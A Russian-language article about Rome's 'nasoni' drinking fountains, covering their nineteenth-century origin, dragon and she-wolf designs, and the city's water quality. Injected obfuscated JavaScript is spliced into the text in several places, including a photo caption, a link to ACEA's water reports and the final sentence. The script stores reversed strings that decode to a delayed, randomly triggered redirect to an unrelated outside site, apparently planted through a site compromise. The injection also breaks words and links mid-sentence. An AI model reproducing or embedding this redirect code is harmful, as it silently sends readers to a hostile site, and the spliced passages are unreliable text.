Римские носы

А знаете ли вы, что больше всего носищ в Риме? Их тут более двух тысяч, они в основном чугунные, и из их краника, напоминающего большущий нос крючком, постоянно льется холодная питьевая вода. В летние жаркие дни это спасение не только для туристов, но для местных жителей и их четвероногих друзей. Ведь разбросаны эти фонтанчики по всему городу: от исторического  центра до периферий города. 

Коренные жители называют эту воду – водой мэра, потому что появились они в начале семидесятых годов XIX века благодаря инициативе одного из первых градоначальников столицы недавно объединившийся Италии – Луиджи Пьянчани.

Высотой немного больше метра и весом почти в сто килограмм чугунные колонки были украшены тремя головами драконов, через которые непрерывно, как и в наши дни, текла чистая холодная питьевая вода.

 

На сегодняшний день в Риме осталось три фонтанчика с головами драконов. Один из них на площади перед Пантеоном – Piazza della Rotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonda. Фото: Benvegnù – Guaitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toli

Со временем их вид немного изменился: вместо драконов появился один единственный закругленный носик. Местные жители ласково прозвали их «назонами», что в переводе значит большие носы. Если отверстие откуда льется вода заткнуть, то она начнет бить фонтанчиком вверх через специальную дырочку в верхней части носика. Утолять жажду так удобнее и гигиеничнее.

Во времена Муссолини, до начала войны, в Риме появились «имперские волчицы» – питьевые фонтаны, построенные из травертина и украшенные головой волчицы. Их и сейчас можно встретить в римских парках и в олимпийской деревне. Всего их осталось около семидесяти в городе. 

На каждом таком источнике можно найти надпись S.P.Q.R. – это аббревиатура латинской фразы «Senatus Populusque Romanus» («Сенат и граждане Рима»). Она есть и на гербе вечного города.

Вода, которая льется из всех этих фонтанчиков та же самая, что льется из кранов дома у римлян – питьевая. Ответственная за водоснабжение столицы компания ACEA  постоянно следит за ее качеством и публикует $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-2/mappa-qualita-acqua-acea-atobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-2″>отчеты на своем сайте. Всемирная организация здравоохранения в целом высоко оценивает воду полуострова, а римскую признает одной из самых лучших в Италии: 97% воды в столице является ключевой и еще 3% – родниковой. Интересный факт, что при этом итальянцы являются одними из самых крупных потребителей бутилированной воды в мире, “лидируя” в Европе.

Существует интерактивная интернет карта и мобильное приложение, благодаря которым в вечном городе можно найти ближайший фонтанчик с питьевой водой. Ведь потребление воды из таких источников позволяет отказаться от пластиковых бутылок и снижает выбросы углекислого газа в атмосферу. Большая часть неиспользованной воды уходит на полив садов, уборку заводов и другие технические нужды.

Со временен Римской империи и постройки акведуков римляни гордятся своим водным богатством, и “назоны” являются его неотъемлемой частью и уникальным символом города, как “винные окошки” во Флоренции и “andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anditskaja-sistema/”>горбы” в Венеции.

 

Источники: https://www.gruppo.acea.it; https://www.romabbella.com; https://www.fontanelle.org; https://www.statista.com

АрхитектураЕвропаЕда и напиткиИталияСлайдерСтрановедение